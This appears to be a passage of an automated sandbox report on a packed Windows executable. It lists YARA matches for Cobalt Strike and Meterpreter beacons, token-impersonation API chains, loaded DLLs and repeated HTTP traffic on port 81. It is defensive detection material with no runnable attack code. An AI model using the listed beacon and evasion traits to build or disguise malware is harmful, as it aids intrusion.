            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: Process Memory Space: k2vUsu5VZ5.exe PID: 7148, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: Process Memory Space: k2vUsu5VZ5.exe PID: 7148, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: Process Memory Space: k2vUsu5VZ5.exe PID: 7148, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0388FE7C LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_0388FE7C
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_03896CB0 TerminateProcess,GetLastError,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,Process32Next,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,htonl,htonl,GetLastError,OpenProcessToken,GetLastError,ImpersonateLoggedOnUser,GetLastError,DuplicateTokenEx,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_03896CB0
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: k2vUsu5VZ5.exeReversingLabs: Detection: 78%
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0040DF90 LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,ExitProcess,0_2_0040DF90
            Source: k2vUsu5VZ5.exeStatic PE information: section name: UPX2
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038B716C push 0000006Ah; retf 0_2_038B7184
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_00160109 push eax; ret 0_2_00160364
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_00160128 push eax; ret 0_2_00160364
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_001602CF push eax; ret 0_2_00160364
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_034A8B56 push ebp; iretd 0_2_034A8B57
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_03489B65 push cs; retf 0_2_03489B66
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_034A8B76 push ebp; iretd 0_2_034A8B77
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_034A8B9F push ebp; iretd 0_2_034A8BA0
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0348B19F push ebp; iretd 0_2_0348B1A0
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_034897A4 push edi; iretd 0_2_034897A5
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1

            Hooking and other Techniques for Hiding and Protection

            barindex
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49849
            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49873
            Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49879
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49886
            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49893
            Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49902
            Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49909
            Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49916
            Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49926
            Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49932
            Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49939
            Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49948
            Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49955
            Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49963
            Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49971
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49988
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50005
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50020
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50035
            Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50051
            Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50060
            Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50068
            Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50076
            Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50083
            Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50093
            Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50094
            Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50095
            Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50096
            Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50097
            Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50098
            Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50099
            Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50100
            Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50102
            Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50103
            Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50104
            Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50105
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50105
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50105
            Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50106
            Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50107
            Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50108
            Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50109
            Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50110
            Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50111
            Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50112
            Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50113
            Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50115
            Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50116
            Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50117
            Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50118
            Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50119
            Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50120
            Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50121
            Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50122
            Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50123
            Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50124
            Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50125
            Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50126
            Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50127
            Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50128
            Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50129
            Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50130
            Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50131
            Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50132
            Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50133
            Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50134
            Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50135
            Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50136
            Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50137
            Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50138
            Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50139
            Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50140
            Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50141
            Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50142
            Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50143
            Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50144
            Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50145
            Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50146
            Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50147
            Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50148
            Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50149
            Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50150
            Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50151
            Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 81
            Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 50152
